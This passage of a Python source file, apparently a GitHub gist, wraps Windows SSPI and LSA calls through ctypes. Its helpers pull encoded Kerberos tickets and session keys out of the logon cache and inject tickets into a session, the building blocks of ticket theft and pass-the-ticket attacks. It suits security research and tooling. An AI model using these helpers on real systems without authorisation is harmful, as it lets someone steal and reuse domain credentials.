sid.SubAuthorityCount = int.from_bytes(buff.read(1), "little", signed=False)
sid.IdentifierAuthority = int.from_bytes(buff.read(6), "big", signed=False)
data = string_at(ptr + 8, sid.SubAuthorityCount * 4)
buff = io.BytesIO(data)
for _ in range(sid.SubAuthorityCount):
sid.SubAuthority.append(
int.from_bytes(buff.read(4), "little", signed=False)
)
return sid
class KERB_PROTOCOL_MESSAGE_TYPE(enum.Enum):
KerbDebugRequestMessage = 0
KerbQueryTicketCacheMessage = 1
KerbChangeMachinePasswordMessage = 2
KerbVerifyPacMessage = 3
KerbRetrieveTicketMessage = 4
KerbUpdateAddressesMessage = 5
KerbPurgeTicketCacheMessage = 6
KerbChangePasswordMessage = 7
KerbRetrieveEncodedTicketMessage = 8
KerbDecryptDataMessage = 9
KerbAddBindingCacheEntryMessage = 10
KerbSetPasswordMessage = 11
KerbSetPasswordExMessage = 12
KerbVerifyCredentialsMessage = 13
KerbQueryTicketCacheExMessage = 14
KerbPurgeTicketCacheExMessage = 15
KerbRefreshSmartcardCredentialsMessage = 16
KerbAddExtraCredentialsMessage = 17
KerbQuerySupplementalCredentialsMessage = 18
KerbTransferCredentialsMessage = 19
KerbQueryTicketCacheEx2Message = 20
KerbSubmitTicketMessage = 21
KerbAddExtraCredentialsExMessage = 22
KerbQueryKdcProxyCacheMessage = 23
KerbPurgeKdcProxyCacheMessage = 24
KerbQueryTicketCacheEx3Message = 25
KerbCleanupMachinePkinitCredsMessage = 26
KerbAddBindingCacheEntryExMessage = 27
KerbQueryBindingCacheMessage = 28
KerbPurgeBindingCacheMessage = 29
KerbQueryDomainExtendedPoliciesMessage = 30
KerbQueryS4U2ProxyCacheMessage = 31
class SEC_E(enum.Enum):
OK = 0x00000000
CONTINUE_NEEDED = 0x00090312
INSUFFICIENT_MEMORY = (
0x80090300
)
INVALID_HANDLE = 0x80090301
UNSUPPORTED_FUNCTION = 0x80090302
TARGET_UNKNOWN = 0x80090303
INTERNAL_ERROR = (
0x80090304
)
SECPKG_NOT_FOUND = 0x80090305
NOT_OWNER = 0x80090306
CANNOT_INSTALL = (
0x80090307
)
INVALID_TOKEN = 0x80090308
CANNOT_PACK = 0x80090309
QOP_NOT_SUPPORTED = 0x8009030A
NO_IMPERSONATION = (
0x8009030B
)
LOGON_DENIED = 0x8009030C
UNKNOWN_CREDENTIALS = (
0x8009030D
)
NO_CREDENTIALS = 0x8009030E
MESSAGE_ALTERED = 0x8009030F
OUT_OF_SEQUENCE = (
0x80090310
)
NO_AUTHENTICATING_AUTHORITY = (
0x80090311
)
BAD_PKGID = 0x80090316
CONTEXT_EXPIRED = 0x80090317
INCOMPLETE_MESSAGE = 0x80090318
INCOMPLETE_CREDENTIALS = 0x80090320
BUFFER_TOO_SMALL = 0x80090321
WRONG_PRINCIPAL = 0x80090322
TIME_SKEW = 0x80090324
UNTRUSTED_ROOT = 0x80090325
ILLEGAL_MESSAGE = (
0x80090326
)
CERT_UNKNOWN = (
0x80090327
)
CERT_EXPIRED = 0x80090328
ENCRYPT_FAILURE = 0x80090329
DECRYPT_FAILURE = 0x80090330
ALGORITHM_MISMATCH = 0x80090331
SECURITY_QOS_FAILED = 0x80090332
UNFINISHED_CONTEXT_DELETED = 0x80090333
NO_TGT_REPLY = 0x80090334
NO_IP_ADDRESSES = 0x80090335
WRONG_CREDENTIAL_HANDLE = 0x80090336
CRYPTO_SYSTEM_INVALID = 0x80090337
MAX_REFERRALS_EXCEEDED = (
0x80090338
)
MUST_BE_KDC = 0x80090339
STRONG_CRYPTO_NOT_SUPPORTED = 0x8009033A
TOO_MANY_PRINCIPALS = (
0x8009033B
)
NO_PA_DATA = 0x8009033C
PKINIT_NAME_MISMATCH = 0x8009033D
SMARTCARD_LOGON_REQUIRED = (
0x8009033E
)
SHUTDOWN_IN_PROGRESS = 0x8009033F
KDC_INVALID_REQUEST = 0x80090340
KDC_UNABLE_TO_REFER = 0x80090341
KDC_UNKNOWN_ETYPE = (
0x80090342
)
UNSUPPORTED_PREAUTH = 0x80090343
DELEGATION_REQUIRED = 0x80090345
BAD_BINDINGS = 0x80090346
MULTIPLE_ACCOUNTS = (
0x80090347
)
NO_KERB_KEY = 0x80090348
CERT_WRONG_USAGE = (
0x80090349
)
DOWNGRADE_DETECTED = 0x80090350
SMARTCARD_CERT_REVOKED = 0x80090351
ISSUING_CA_UNTRUSTED = 0x80090352
REVOCATION_OFFLINE_C = 0x80090353
PKINIT_CLIENT_FAILURE = 0x80090354
SMARTCARD_CERT_EXPIRED = 0x80090355
NO_S4U_PROT_SUPPORT = 0x80090356
CROSSREALM_DELEGATION_FAILURE = 0x80090357
REVOCATION_OFFLINE_KDC = 0x80090358
ISSUING_CA_UNTRUSTED_KDC = 0x80090359
KDC_CERT_EXPIRED = 0x8009035A
KDC_CERT_REVOKED = 0x8009035B
INVALID_PARAMETER = (
0x8009035D
)
DELEGATION_POLICY = 0x8009035E
POLICY_NLTM_ONLY = 0x8009035F
RENEGOTIATE = 590625
COMPLETE_AND_CONTINUE = 590612
COMPLETE_NEEDED = 590611
class SECPKG_CRED(enum.IntFlag):
AUTOLOGON_RESTRICTED = 0x00000010
BOTH = 3
INBOUND = 1
OUTBOUND = 2
PROCESS_POLICY_ONLY = 0x00000020
class ISC_REQ(enum.IntFlag):
DELEGATE = 1
MUTUAL_AUTH = 2
REPLAY_DETECT = 4
SEQUENCE_DETECT = 8
CONFIDENTIALITY = 16
USE_SESSION_KEY = 32
PROMPT_FOR_CREDS = 64
USE_SUPPLIED_CREDS = 128
ALLOCATE_MEMORY = 256
USE_DCE_STYLE = 512
DATAGRAM = 1024
CONNECTION = 2048
CALL_LEVEL = 4096
FRAGMENT_SUPPLIED = 8192
EXTENDED_ERROR = 16384
STREAM = 32768
INTEGRITY = 65536
IDENTIFY = 131072
NULL_SESSION = 262144
MANUAL_CRED_VALIDATION = 524288
RESERVED1 = 1048576
FRAGMENT_TO_FIT = 2097152
HTTP = 0x10000000
class SECPKG_ATTR(enum.Enum):
SESSION_KEY = 9
C_ACCESS_TOKEN = 0x80000012
C_FULL_ACCESS_TOKEN = 0x80000082
CERT_TRUST_STATUS = 0x80000084
CREDS = 0x80000080
CREDS_2 = 0x80000086
NEGOTIATION_PACKAGE = 0x80000081
PACKAGE_INFO = 10
SERVER_AUTH_FLAGS = 0x80000083
SIZES = 0x0
SUBJECT_SECURITY_ATTRIBUTES = 124
ENDPOINT_BINDINGS = 26
class SECBUFFER_TYPE(enum.Enum):
SECBUFFER_ALERT = 17
SECBUFFER_ATTRMASK = 4026531840
SECBUFFER_CHANNEL_BINDINGS = 14
SECBUFFER_CHANGE_PASS_RESPONSE = (
15
)
SECBUFFER_DATA = 1
SECBUFFER_DTLS_MTU = 24
SECBUFFER_EMPTY = 0
SECBUFFER_EXTRA = 5
SECBUFFER_MECHLIST = 11
SECBUFFER_MECHLIST_SIGNATURE = 12
SECBUFFER_MISSING = 4
SECBUFFER_PKG_PARAMS = 3
SECBUFFER_PRESHARED_KEY = 22
SECBUFFER_PRESHARED_KEY_IDENTITY = (
23
)
SECBUFFER_SRTP_MASTER_KEY_IDENTIFIER = (
20
)
SECBUFFER_SRTP_PROTECTION_PROFILES = 19
SECBUFFER_STREAM_HEADER = 7
SECBUFFER_STREAM_TRAILER = 6
SECBUFFER_TARGET = 13
SECBUFFER_TARGET_HOST = (
16
)
SECBUFFER_TOKEN = 2
SECBUFFER_TOKEN_BINDING = 21
SECBUFFER_APPLICATION_PROTOCOLS = 18
SECBUFFER_PADDING = 9
class FILETIME(Structure):
_fields_ = [
("dwLowDateTime", DWORD),
("dwHighDateTime", DWORD),
]
PFILETIME = POINTER(FILETIME)
TimeStamp = FILETIME
PTimeStamp = PFILETIME
class SecPkgContext_SessionKey(Structure):
_fields_ = [("SessionKeyLength", ULONG), ("SessionKey", LPBYTE)]
@property
def Buffer(self):
return string_at(self.SessionKey, size=self.SessionKeyLength)
class SecHandle(Structure):
_fields_ = [("dwLower", POINTER(ULONG)), ("dwUpper", POINTER(ULONG))]
def __init__(
self,
):
super(SecHandle, self).__init__(pointer(ULONG()), pointer(ULONG()))
class SecBuffer(Structure):
_fields_ = [("cbBuffer", ULONG), ("BufferType", ULONG), ("pvBuffer", PVOID)]
def __init__(
self, token=b"\x00" * maxtoken_size, buffer_type=SECBUFFER_TYPE.SECBUFFER_TOKEN
):
buf = create_string_buffer(token, size=len(token))
Structure.__init__(
self, sizeof(buf), buffer_type.value, cast(byref(buf), PVOID)
)
@property
def Buffer(self):
return (
SECBUFFER_TYPE(self.BufferType),
string_at(self.pvBuffer, size=self.cbBuffer),
)
class SecBufferDesc(Structure):
_fields_ = [
("ulVersion", ULONG),
("cBuffers", ULONG),
("pBuffers", POINTER(SecBuffer)),
]
def __init__(self, secbuffers=None):
if secbuffers is not None:
Structure.__init__(
self, 0, len(secbuffers), (SecBuffer * len(secbuffers))(*secbuffers)
)
else:
Structure.__init__(self, 0, 1, pointer(SecBuffer()))
def __getitem__(self, index):
return self.pBuffers[index]
@property
def Buffers(self):
data = []
for i in range(self.cBuffers):
data.append(self.pBuffers[i].Buffer)
return data
PSecBufferDesc = POINTER(SecBufferDesc)
PSecHandle = POINTER(SecHandle)
CredHandle = SecHandle
PCredHandle = PSecHandle
CtxtHandle = SecHandle
PCtxtHandle = PSecHandle
class LUID(Structure):
_fields_ = [
("LowPart", DWORD),
("HighPart", LONG),
]
def to_int(self):
return LUID.luid_to_int(self)
@staticmethod
def luid_to_int(luid):
return (luid.HighPart << 32) + luid.LowPart
@staticmethod
def from_int(i):
luid = LUID()
luid.HighPart = i >> 32
luid.LowPart = i & 0xFFFFFFFF
return luid
PLUID = POINTER(LUID)
class LSA_STRING(Structure):
_fields_ = [
("Length", USHORT),
("MaximumLength", USHORT),
("Buffer", POINTER(c_char)),
]
def to_string(self):
return string_at(self.Buffer, self.MaximumLength).decode()
PLSA_STRING = POINTER(LSA_STRING)
class LSA_UNICODE_STRING(Structure):
_fields_ = [
("Length", USHORT),
("MaximumLength", USHORT),
("Buffer", POINTER(c_char)),
]
@staticmethod
def from_string(s):
s = s.encode("utf-16-le")
lus = LSA_UNICODE_STRING()
lus.Buffer = create_string_buffer(s, len(s))
lus.MaximumLength = len(s) + 1
lus.Length = len(s)
return lus
def to_string(self):
return (
string_at(self.Buffer, self.MaximumLength)
.decode("utf-16-le")
.replace("\x00", "")
)
class KERB_CRYPTO_KEY(Structure):
_fields_ = [
("KeyType", LONG),
("Length", ULONG),
("Value", PVOID),
]
def to_dict(self):
return {"KeyType": self.KeyType, "Key": string_at(self.Value, self.Length)}
class KERB_EXTERNAL_TICKET(Structure):
_fields_ = [
("ServiceName", PVOID),
("TargetName", PVOID),
("ClientName", PVOID),
("DomainName", LSA_UNICODE_STRING),
("TargetDomainName", LSA_UNICODE_STRING),
("AltTargetDomainName", LSA_UNICODE_STRING),
("SessionKey", KERB_CRYPTO_KEY),
("TicketFlags", ULONG),
("Flags", ULONG),
("KeyExpirationTime", LARGE_INTEGER),
("StartTime", LARGE_INTEGER),
("EndTime", LARGE_INTEGER),
("RenewUntil", LARGE_INTEGER),
("TimeSkew", LARGE_INTEGER),
("EncodedTicketSize", ULONG),
("EncodedTicket", PVOID),
]
def get_data(self):
return {
"Key": self.SessionKey.to_dict(),
"Ticket": string_at(self.EncodedTicket, self.EncodedTicketSize),
}
class KERB_SUBMIT_TKT_REQUEST(Structure):
_fields_ = [
("MessageType", DWORD),
("LogonId", LUID),
("TicketFlags", ULONG),
("Key", KERB_CRYPTO_KEY),
("KerbCredSize", ULONG),
("KerbCredOffset", ULONG),
]
KERB_SUBMIT_TKT_REQUEST_OFFSET = sizeof(KERB_SUBMIT_TKT_REQUEST())
def submit_tkt_helper(ticket_data, logonid=0):
offset = KERB_SUBMIT_TKT_REQUEST_OFFSET - 4
if isinstance(logonid, int):
logonid = LUID.from_int(logonid)
class KERB_SUBMIT_TKT_REQUEST(Structure):
_pack_ = 4
_fields_ = [
("MessageType", DWORD),
("LogonId", LUID),
("TicketFlags", ULONG),
("Length", ULONG),
("Value", PVOID),
("KerbCredSize", ULONG),
("KerbCredOffset", ULONG),
("TicketData", c_byte * len(ticket_data)),
]
req = KERB_SUBMIT_TKT_REQUEST()
req.MessageType = KERB_PROTOCOL_MESSAGE_TYPE.KerbSubmitTicketMessage.value
req.LogonId = logonid
req.TicketFlags = 0
req.Key = KERB_CRYPTO_KEY()
req.KerbCredSize = len(ticket_data)
req.TicketData = (c_byte * len(ticket_data))(*ticket_data)
req.KerbCredOffset = offset
return req
class KERB_RETRIEVE_TKT_REQUEST(Structure):
_fields_ = [
("MessageType", DWORD),
("LogonId", LUID),
("TargetName", LSA_UNICODE_STRING),
("TicketFlags", ULONG),
("CacheOptions", ULONG),
("EncryptionType", LONG),
("CredentialsHandle", PVOID),
]
def __init__(
self,
targetname,
ticketflags=0x0,
cacheoptions=0x8,
encryptiontype=0x0,
logonid=0,
):
if isinstance(logonid, int):
logonid = LUID.from_int(logonid)
super(KERB_RETRIEVE_TKT_REQUEST, self).__init__(
KERB_PROTOCOL_MESSAGE_TYPE.KerbRetrieveEncodedTicketMessage.value,
logonid,
LSA_UNICODE_STRING.from_string(targetname),
ticketflags,
cacheoptions,
encryptiontype,
None,
)
def retrieve_tkt_helper(
targetname,
logonid=0,
ticketflags=0x0,
cacheoptions=0x8,
encryptiontype=0x0,
temp_offset=0,
):
if isinstance(logonid, int):
logonid = LUID.from_int(logonid)
targetname_enc = targetname.encode("utf-16-le") + b"\x00\x00"
targetname_len_alloc = len(targetname_enc)
class KERB_RETRIEVE_TKT_REQUEST(Structure):
_fields_ = [
("MessageType", DWORD),
("LogonId", LUID),
("TargetName", LSA_UNICODE_STRING),
("TicketFlags", ULONG),
("CacheOptions", ULONG),
("EncryptionType", LONG),
("CredentialsHandle", PVOID),
(
"UNK",
PVOID,
),
("TargetNameData", (c_byte * targetname_len_alloc)),
]
req = KERB_RETRIEVE_TKT_REQUEST()
req.MessageType = KERB_PROTOCOL_MESSAGE_TYPE.KerbRetrieveEncodedTicketMessage.value
req.LogonId = logonid
req.TicketFlags = ticketflags
req.CacheOptions = cacheoptions
req.EncryptionType = encryptiontype
req.TargetNameData = (c_byte * len(targetname_enc))(*targetname_enc)
struct_end = addressof(req) + sizeof(req)
targetname_start = struct_end - targetname_len_alloc
targetname_start_padded = targetname_start - (targetname_start % sizeof(c_void_p))
lsa_target = LSA_UNICODE_STRING()
lsa_target.Length = len(targetname.encode("utf-16-le"))
lsa_target.MaximumLength = targetname_len_alloc
lsa_target.Buffer = cast(targetname_start_padded, POINTER(c_char))
req.TargetName = lsa_target
return req
class KERB_RETRIEVE_TKT_RESPONSE(Structure):
_fields_ = [
("Ticket", KERB_EXTERNAL_TICKET),
]
try:
INVALID_HANDLE_VALUE = c_void_p(-1).value
except TypeError:
if sizeof(c_void_p) == 4:
INVALID_HANDLE_VALUE = 0xFFFFFFFF
elif sizeof(c_void_p) == 8:
INVALID_HANDLE_VALUE = 0xFFFFFFFFFFFFFFFF
else:
raise
def get_lsa_error(ret_status):
return WinError(LsaNtStatusToWinError(ret_status))
def LsaRaiseIfNotErrorSuccess(result, func=None, arguments=()):
if result != ERROR_SUCCESS:
raise WinError(LsaNtStatusToWinError(result))
return result
def LsaNtStatusToWinError(errcode):
_LsaConnectUntrusted = windll.Advapi32.LsaNtStatusToWinError
_LsaConnectUntrusted.argtypes = [NTSTATUS]
_LsaConnectUntrusted.restype = ULONG
res = _LsaConnectUntrusted(errcode)
if res == 0x13D:
raise Exception("ERROR_MR_MID_NOT_FOUND for %s" % errcode)
return res
def LsaFreeReturnBuffer(pbuffer):
_LsaFreeReturnBuffer = windll.Secur32.LsaFreeReturnBuffer
_LsaFreeReturnBuffer.argtypes = [PVOID]
_LsaFreeReturnBuffer.restype = NTSTATUS
_LsaFreeReturnBuffer.errcheck = LsaRaiseIfNotErrorSuccess
_LsaFreeReturnBuffer(pbuffer)
def LsaConnectUntrusted():
_LsaConnectUntrusted = windll.Secur32.LsaConnectUntrusted
_LsaConnectUntrusted.argtypes = [PHANDLE]
_LsaConnectUntrusted.restype = NTSTATUS
_LsaConnectUntrusted.errcheck = LsaRaiseIfNotErrorSuccess
lsa_handle = HANDLE(INVALID_HANDLE_VALUE)
_LsaConnectUntrusted(byref(lsa_handle))
return lsa_handle
def LsaLookupAuthenticationPackage(lsa_handle, package_name):
_LsaLookupAuthenticationPackage = windll.Secur32.LsaLookupAuthenticationPackage
_LsaLookupAuthenticationPackage.argtypes = [HANDLE, PLSA_STRING, PULONG]
_LsaLookupAuthenticationPackage.restype = NTSTATUS
_LsaLookupAuthenticationPackage.errcheck = LsaRaiseIfNotErrorSuccess
if isinstance(package_name, str):
package_name = package_name.encode()
pname = LSA_STRING()
pname.Buffer = create_string_buffer(package_name)
pname.Length = len(package_name)
pname.MaximumLength = len(package_name) + 1
package_id = ULONG(0)
_LsaLookupAuthenticationPackage(lsa_handle, byref(pname), byref(package_id))
return package_id.value
def LsaCallAuthenticationPackage(lsa_handle, package_id, message):
_LsaCallAuthenticationPackage = windll.Secur32.LsaCallAuthenticationPackage
_LsaCallAuthenticationPackage.argtypes = [
HANDLE,
ULONG,
PVOID,
ULONG,
PVOID,
PULONG,
PNTSTATUS,
]
_LsaCallAuthenticationPackage.restype = DWORD
_LsaCallAuthenticationPackage.errcheck = LsaRaiseIfNotErrorSuccess
if not isinstance(message, Structure):
message = bytes(message)
message_len = len(message)
else:
message_len = len(bytes(message))
return_msg_p = c_void_p()
return_msg_len = ULONG(0)
return_status = NTSTATUS(INVALID_HANDLE_VALUE)
_LsaCallAuthenticationPackage(
lsa_handle,
package_id,
byref(message),
message_len,
byref(return_msg_p),
byref(return_msg_len),
byref(return_status),
)
return_msg = b""
free_ptr = None
if return_msg_len.value > 0:
return_msg = string_at(return_msg_p, return_msg_len.value)
free_ptr = return_msg_p
return return_msg, return_status.value, free_ptr
def AcquireCredentialsHandle(
client_name, package_name, tragetspn, cred_usage, pluid=None, authdata=None
):
def errc(result, func, arguments):
if SEC_E(result) == SEC_E.OK:
return result
raise Exception(
"%s failed with error code %s (%s)"
% ("AcquireCredentialsHandle", result, SEC_E(result))
)
_AcquireCredentialsHandle = windll.Secur32.AcquireCredentialsHandleA
_AcquireCredentialsHandle.argtypes = [
PSEC_CHAR,
PSEC_CHAR,
ULONG,
PLUID,
PVOID,
PVOID,
PVOID,
PCredHandle,
PTimeStamp,
]
_AcquireCredentialsHandle.restype = DWORD
_AcquireCredentialsHandle.errcheck = errc
cn = None
if client_name:
cn = LPSTR(client_name.encode("ascii"))
pn = LPSTR(package_name.encode("ascii"))
creds = CredHandle()
ts = TimeStamp()
_AcquireCredentialsHandle(
cn, pn, cred_usage, pluid, authdata, None, None, byref(creds), byref(ts)
)
return creds
def QueryContextAttributes(ctx, attr, sec_struct):
def errc(result, func, arguments):
if SEC_E(result) == SEC_E.OK:
return SEC_E(result)
raise Exception(
"%s failed with error code %s (%s)"
% ("QueryContextAttributes", result, SEC_E(result))
)
_QueryContextAttributes = windll.Secur32.QueryContextAttributesW
_QueryContextAttributes.argtypes = [PCtxtHandle, ULONG, PVOID]
_QueryContextAttributes.restype = DWORD
_QueryContextAttributes.errcheck = errc
_QueryContextAttributes(byref(ctx), attr.value, byref(sec_struct))
return
def InitializeSecurityContext(
creds,
target,
ctx=None,
flags=ISC_REQ.INTEGRITY
| ISC_REQ.CONFIDENTIALITY
| ISC_REQ.SEQUENCE_DETECT
| ISC_REQ.REPLAY_DETECT,
TargetDataRep=0,
token=None,
):
def errc(result, func, arguments):
if SEC_E(result) in [
SEC_E.OK,
SEC_E.COMPLETE_AND_CONTINUE,
SEC_E.COMPLETE_NEEDED,
SEC_E.CONTINUE_NEEDED,
SEC_E.INCOMPLETE_CREDENTIALS,
]:
return SEC_E(result)
raise Exception(
"%s failed with error code %s (%s)"
% ("InitializeSecurityContext", result, SEC_E(result))
)
_InitializeSecurityContext = windll.Secur32.InitializeSecurityContextA
_InitializeSecurityContext.argtypes = [
PCredHandle,
PCtxtHandle,
PSEC_CHAR,
ULONG,
ULONG,
ULONG,
PSecBufferDesc,
ULONG,
PCtxtHandle,
PSecBufferDesc,
PULONG,
PTimeStamp,
]
_InitializeSecurityContext.restype = DWORD
_InitializeSecurityContext.errcheck = errc
if target:
ptarget = LPSTR(target.encode("ascii"))
else:
ptarget = None
newbuf = SecBufferDesc()
outputflags = ULONG()
expiry = TimeStamp()
if token:
token = SecBufferDesc([SecBuffer(token)])
if not ctx:
ctx = CtxtHandle()
res = _InitializeSecurityContext(
byref(creds),
None,
ptarget,
int(flags),
0,
TargetDataRep,
byref(token) if token else None,
0,
byref(ctx),
byref(newbuf),
byref(outputflags),
byref(expiry),
)
else:
res = _InitializeSecurityContext(
byref(creds),
byref(ctx),
ptarget,
int(flags),
0,
TargetDataRep,
byref(token) if token else None,
0,
byref(ctx),
byref(newbuf),
byref(outputflags),
byref(expiry),
)
data = newbuf.Buffers
return res, ctx, data, ISC_REQ(outputflags.value), expiry
def extract_ticket(lsa_handle, package_id, luid, target_name):
message = retrieve_tkt_helper(target_name, logonid=luid)
ret_msg, ret_status, free_ptr = LsaCallAuthenticationPackage(
lsa_handle, package_id, message
)
ticket = {}
if ret_status != 0:
raise WinError(LsaNtStatusToWinError(ret_status))
if len(ret_msg) > 0:
resp = KERB_RETRIEVE_TKT_RESPONSE.from_buffer_copy(ret_msg)
ticket = resp.Ticket.get_data()
LsaFreeReturnBuffer(free_ptr)
return ticket
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment